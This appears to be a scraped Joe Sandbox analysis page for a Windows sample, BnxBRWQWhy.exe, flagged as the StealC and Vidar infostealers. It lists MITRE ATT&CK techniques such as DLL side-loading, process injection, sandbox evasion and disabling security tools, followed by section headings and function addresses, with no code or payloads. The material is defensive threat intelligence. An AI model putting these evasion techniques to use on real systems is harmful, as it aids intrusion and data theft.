Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BnxBRWQWhy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
BnxBRWQWhy.exe

Function 007345C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Function 00749860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Function 00734880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00749C10 Relevance: 203.7, APIs: 112, Strings: 4, Instructions: 684
libraryloaderCOMMON

Function 00736280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 007417A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Function 00745510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 007452C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138
stringCOMMON

Function 00747500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 007469F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Function 007347B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Function 00731220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00746AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON